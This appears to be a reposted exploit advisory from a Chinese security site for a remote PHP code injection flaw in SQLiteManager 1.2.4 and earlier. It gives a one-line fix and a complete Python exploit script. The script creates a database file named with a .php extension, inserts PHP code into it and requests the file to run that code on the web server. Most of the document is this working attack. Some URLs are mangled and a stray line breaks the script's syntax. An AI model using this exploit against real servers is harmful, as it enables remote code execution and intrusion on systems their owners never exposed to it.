概述: =============================================================== 标题: SQLiteManager 0Day Remote PHP Code Injection Vulnerability 作者: RealGame 开发者: http://HdhCmsTestRelagame.co.il 下载地址: http://sourceforge.net/projects/sqlitemanager/ 影响版本 <=1.2.4 测试系统: Windows XP, Debian 2.6.32-46 =============================================================== 缺陷程序 Name: SQLiteManager Official Site: http://HdhCmsTestsqlitemanager.org/ Name: Ampps Official Site: http://HdhCmsTestampps测试数据/ Name: VertrigoServ Official Site: http://vertrigo.sourceforge.net/ =============================================================== 程序介绍 Official Site: http://HdhCmsTestsqlitemanager.org/ SQLiteManager is a database manager for SQLite databases. You can manage any SQLite database created on any platform with SQLiteManager. =============================================================== Easy Way To Fix: Find: SQLiteStripSlashes($_POST['dbpath']) Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath'])) On File: ./include/add_database.php =============================================================== import re import urllib2 from urllib import urlencode from sys import argv, exit def strip_tags(value): #Strip tags with RegEx return re.sub('<[^>]*?>', '', value) def getDbId(sqliteUrl, myDbName): #Find Components htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read() if htmlRes: #If you found it take all the rows td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL) #Make a dict of stripped columns for element in td: if strip_tags(element) == myDbName: #Return Id return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL)) return None def main(): HdhCmsTest2cto测试数据 print \ 'SQLiteManager Exploit\n' + \ 'Made By RealGame\n' + \ 'http://HdhCmsTestRealGame.co.il\n' if len(argv) < 2: #replace('\\', '/') - To Do The Same In Win And Linux filename = argv[0].replace('\\', '/').split('/')[-1] print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n' exit() sqliteUrl = argv[1] myDbName = "phpinfo" myDbFile = "phpinfo.php" #Create Database params = {'dbname' : myDbName, 'dbVersion' : '2', 'dbRealpath' : None, 'dbpath' : myDbFile, 'action' : 'saveDb'} urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120) #Get Database ID dbId = getDbId(sqliteUrl + "left.php", myDbName) #If Database Created if dbId: #Create Table + Shell Creator params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \ 'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n', 'sqlFile' : None, 'action' : 'sql', 'sqltype' : '1'} urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120) #Inject Code urllib2.urlopen(sqliteUrl + myDbFile, None, 120) #Remove Database urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120) print 'Succeed' return print 'Failed' if __name__ == '__main__': main()
查看更多关于SQLiteManager 1.2.4远程php代码注射 - 网站安全 - 自学的详细内容...